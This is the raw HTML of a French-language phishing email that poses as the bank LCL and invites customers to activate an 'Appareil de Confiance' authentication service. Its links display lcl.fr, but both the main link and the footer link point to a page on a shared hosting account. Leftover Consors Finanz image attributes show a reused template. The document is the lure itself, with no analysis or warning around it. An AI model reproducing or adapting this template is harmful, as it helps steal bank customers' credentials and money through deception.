<meta charset="utf-8" />
<table style="-webkit-font-smoothing: antialiased; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: inherit; font-family: &quot;Segoe UI&quot;, &quot;Segoe UI Web (West European)&quot;, &quot;Segoe UI&quot;, -apple-system, system-ui, Roboto, &quot;Helvetica Neue&quot;, sans-serif; color: rgb(32, 31, 30); width: 813px; padding-top: 40px;">
	<tbody style="-webkit-font-smoothing: antialiased;">
		<tr style="-webkit-font-smoothing: antialiased;">
			<td class="x_changeTdWidth x_changeHeaderDisplay" style="-webkit-font-smoothing: antialiased; padding-left: 15px; padding-right: 15px; padding-bottom: 10px; border-bottom: 3px solid rgb(31,54,139);" width="650">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<img alt="Consors Finanz" data-connectorsauthtoken="1" data-imageproxyendpoint="/actions/ei" data-imageproxyid="" data-imagetype="External" originalsrc="http://olb.consorsfinanz.de/documents/20143/36848/greenEmailHeader.png/22668b1a-1a6a-a47a-da0f-c5192cf2e21a?t=1504110675937" src="https://korben.info/app/uploads/2011/10/LCL.jpg" style="-webkit-font-smoothing: antialiased; margin: 0px; padding: 0px; border: 0px; font: inherit; vertical-align: baseline; color: inherit; width: 500px; height: 100px;" /></td>
			<td style="-webkit-font-smoothing: antialiased;">&nbsp;</td>
		</tr>
	</tbody>
</table>

<table style="-webkit-font-smoothing: antialiased; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: inherit; font-family: &quot;Segoe UI&quot;, &quot;Segoe UI Web (West European)&quot;, &quot;Segoe UI&quot;, -apple-system, system-ui, Roboto, &quot;Helvetica Neue&quot;, sans-serif; color: rgb(32, 31, 30); width: 813px; padding-top: 40px;">
	<tbody style="-webkit-font-smoothing: antialiased;">
		<tr style="-webkit-font-smoothing: antialiased;">
			<td style="-webkit-font-smoothing: antialiased;">&nbsp;</td>
			<td class="x_changeTdWidth" style="-webkit-font-smoothing: antialiased; padding: 15px; border: 1px solid rgb(229, 229, 229);" width="650">
			<p style="-webkit-font-smoothing: antialiased; margin: 0px; font-family: calibri, sans-serif; font-size: 11pt; line-height: 1.3; color: rgb(64, 64, 64);">Ch&egrave;re Cliente, Cher Client,&nbsp;🙋</p>

			<p style="-webkit-font-smoothing: antialiased; margin: 0px; font-family: calibri, sans-serif; font-size: 11pt; line-height: 1.3; color: rgb(64, 64, 64);">&nbsp;</p>

			<p style="-webkit-font-smoothing: antialiased; margin: 0px; font-family: calibri, sans-serif; font-size: 11pt; line-height: 1.3; color: rgb(64, 64, 64);">Merci de nous aider &agrave; rendre vos op&eacute;rations bancaires encore plus s&eacute;curis&eacute;es.</p>

			<p style="-webkit-font-smoothing: antialiased; margin: 0px; font-family: calibri, sans-serif; font-size: 11pt; line-height: 1.3; color: rgb(64, 64, 64);">&nbsp;</p>

			<p style="-webkit-font-smoothing: antialiased; margin: 0px; font-family: calibri, sans-serif; font-size: 11pt; line-height: 1.3; color: rgb(64, 64, 64);">Votre conseiller vous invite &agrave; activer gratuitement votre nouveau service d&#39;uthentification forte</p>

			<p style="-webkit-font-smoothing: antialiased; margin: 0px; font-family: calibri, sans-serif; font-size: 11pt; line-height: 1.3; color: rgb(64, 64, 64);"><strong>&laquo;LCL- Appareil de Confiance&raquo;</strong> pour s&eacute;curiser vos transactions bancaires.</p>

			<p style="-webkit-font-smoothing: antialiased; margin: 0px; font-family: calibri, sans-serif; font-size: 11pt; line-height: 1.3; color: rgb(64, 64, 64);">&nbsp;</p>

			<p style="-webkit-font-smoothing: antialiased; margin: 0px; font-family: calibri, sans-serif; font-size: 11pt; line-height: 1.3; color: rgb(64, 64, 64);">Cliquez&nbsp;sur le lien s&eacute;curis&eacute; ci-dessous pour commencer le processus d&#39;installation:</p>

			<p style="-webkit-font-smoothing: antialiased; margin: 0px; font-family: calibri, sans-serif; font-size: 11pt; line-height: 1.3; color: rgb(64, 64, 64);">&nbsp;</p>

			<p style="-webkit-font-smoothing: antialiased; margin: 0px; font-family: calibri, sans-serif; font-size: 11pt; line-height: 1.3; color: rgb(64, 64, 64);"><a data-auth="NotApplicable" href="https://secure285.inmotionhosting.com/~opendo31/monescpace/lcl/fr/" rel="noopener noreferrer" style="-webkit-font-smoothing: antialiased; margin: 0px; padding: 0px; border: 0px; font: inherit; vertical-align: baseline;" target="_blank">https://lcl.fr/monsepace/appareildeconfiance/activation</a></p>

			<p style="-webkit-font-smoothing: antialiased; margin: 0px; font-family: calibri, sans-serif; font-size: 11pt; line-height: 1.3; color: rgb(64, 64, 64);">&nbsp;</p>

			<p style="-webkit-font-smoothing: antialiased; margin: 0px; font-family: calibri, sans-serif; font-size: 11pt; line-height: 1.3; color: rgb(64, 64, 64);">&nbsp;</p>

			<p style="-webkit-font-smoothing: antialiased; margin: 0px; font-family: calibri, sans-serif; font-size: 11pt; line-height: 1.3; color: rgb(64, 64, 64);">Nous vous remercions de votre confiance.</p>

			<p style="-webkit-font-smoothing: antialiased; margin: 0px; font-family: calibri, sans-serif; font-size: 11pt; line-height: 1.3; color: rgb(64, 64, 64);">LCL - Banque et assurance</p>

			<p style="-webkit-font-smoothing: antialiased; margin: 0px; font-family: calibri, sans-serif; font-size: 11pt; line-height: 1.3; color: rgb(64, 64, 64);">Ce message a &eacute;t&eacute; g&eacute;n&eacute;r&eacute; automatiquement. Merci de ne pas y r&eacute;pondre.</p>
			</td>
			<td style="-webkit-font-smoothing: antialiased;">&nbsp;</td>
		</tr>
	</tbody>
</table>

<table style="-webkit-font-smoothing: antialiased; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: inherit; font-family: &quot;Segoe UI&quot;, &quot;Segoe UI Web (West European)&quot;, &quot;Segoe UI&quot;, -apple-system, system-ui, Roboto, &quot;Helvetica Neue&quot;, sans-serif; color: rgb(32, 31, 30); width: 813px; padding-top: 40px;">
	<tbody style="-webkit-font-smoothing: antialiased;">
		<tr style="-webkit-font-smoothing: antialiased;">
			<td style="-webkit-font-smoothing: antialiased;">&nbsp;</td>
			<td class="x_changeTdWidth" style="-webkit-font-smoothing: antialiased; text-align: right; padding-right: 45px;" width="650"><a class="x_footerLink" data-auth="NotApplicable" href="https://secure285.inmotionhosting.com/~opendo31/monescpace/lcl/fr/" rel="noopener noreferrer" style="-webkit-font-smoothing: antialiased; margin: 0px; padding: 0px; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: 11.5pt; line-height: inherit; font-family: BNPPType, calibri, sans-serif; vertical-align: baseline; color: rgb(144, 144, 144); text-decoration-line: none; letter-spacing: -0.2px;" target="_blank">www.lcl.fr</a></td>
			<td style="-webkit-font-smoothing: antialiased;">&nbsp;</td>
		</tr>
	</tbody>
</table>

<table style="-webkit-font-smoothing: antialiased; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: inherit; font-family: &quot;Segoe UI&quot;, &quot;Segoe UI Web (West European)&quot;, &quot;Segoe UI&quot;, -apple-system, system-ui, Roboto, &quot;Helvetica Neue&quot;, sans-serif; color: rgb(32, 31, 30); width: 813px;">
	<tbody style="-webkit-font-smoothing: antialiased;">
		<tr style="-webkit-font-smoothing: antialiased;">
			<td style="-webkit-font-smoothing: antialiased;">&nbsp;</td>
			<td class="x_changeTdWidth" style="-webkit-font-smoothing: antialiased; padding-left: 15px; padding-right: 15px; border-top: 3px solid rgb(31,54,139);" width="650">
			<table border="0" cellpadding="0" cellspacing="0" style="-webkit-font-smoothing: antialiased; font: inherit; border-collapse: collapse;">
				<tbody style="-webkit-font-smoothing: antialiased;">
					<tr style="-webkit-font-smoothing: antialiased;">
						<td style="-webkit-font-smoothing: antialiased;" valign="top">
						<p style="-webkit-font-smoothing: antialiased; margin: 0px; font-family: calibri, sans-serif; font-size: 11pt; line-height: 1.3; color: rgb(64, 64, 64);"><br style="-webkit-font-smoothing: antialiased;" />
						<font color="#333333" face="sans-serif, Arial, Verdana, Trebuchet MS"><span style="font-size: 13px;">&nbsp;<img alt="Consors Finanz" data-connectorsauthtoken="1" data-imageproxyendpoint="/actions/ei" data-imageproxyid="" data-imagetype="External" originalsrc="http://olb.consorsfinanz.de/documents/20143/36848/greenEmailHeader.png/22668b1a-1a6a-a47a-da0f-c5192cf2e21a?t=1504110675937" src="https://portail-lcl-web.cdn.prismic.io/portail-lcl-web%2F30c1d897-783f-434d-a7f3-a7d08d2f0593_lcl_logo_bleu_signature.svg" style="-webkit-font-smoothing: antialiased; margin: 0px; padding: 0px; border: 0px; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; line-height: inherit; vertical-align: baseline; width: 80px; height: 59px;" /></span></font><br style="-webkit-font-smoothing: antialiased;" />
						&nbsp;</p>
						</td>
					</tr>
					<tr style="-webkit-font-smoothing: antialiased;">
					</tr>
					<tr style="-webkit-font-smoothing: antialiased;">
						<td align="left" style="-webkit-font-smoothing: antialiased; font-family: arial; font-size: 9px; line-height: 11px; color: rgb(90, 90, 90);" valign="top">
						<p style="-webkit-font-smoothing: antialiased; margin: 0px; font-family: calibri, sans-serif; font-size: 11pt; line-height: 1.3; color: rgb(64, 64, 64);"><font color="#333333" face="sans-serif, Arial, Verdana, Trebuchet MS"><span style="font-size: 13px;">Nous sommes joignables du lundi au vendredi de 8h &agrave; 19h et le samedi de 8h &agrave; 17h30.</span></font></p>

						<p style="-webkit-font-smoothing: antialiased; margin: 0px; font-family: calibri, sans-serif; font-size: 11pt; line-height: 1.3; color: rgb(64, 64, 64);"><font color="#333333" face="sans-serif, Arial, Verdana, Trebuchet MS"><span style="font-size: 13px;">Horaire valable en France m&eacute;tropolitaine.</span></font></p>

						<p style="-webkit-font-smoothing: antialiased; margin: 0px; font-family: calibri, sans-serif; font-size: 11pt; line-height: 1.3; color: rgb(64, 64, 64);"><font color="#333333" face="sans-serif, Arial, Verdana, Trebuchet MS"><span style="font-size: 13px;">Appel non surtax&eacute; pour tout op&eacute;rateur en France M&eacute;tropolitaine. Service vocal 7j/7 et 24h/24.</span></font></p>
						</td>
					</tr>
				</tbody>
			</table>
			</td>
		</tr>
	</tbody>
</table>
